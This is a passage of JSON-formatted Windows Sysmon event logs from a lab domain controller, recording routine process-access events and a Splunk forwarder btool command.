06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010D07B0500}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010D07B0500}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.704\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-00108F7C0500}\r\nProcessId: 4484\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-0010D07B0500}\r\nParentProcessId: 3292\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.704","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-00108F7C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010D07B0500}","ParentProcessId":"3292","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010D07B0500}\r\nSourceProcessId: 3292\r\nSourceThreadId: 4408\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00108F7C0500}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 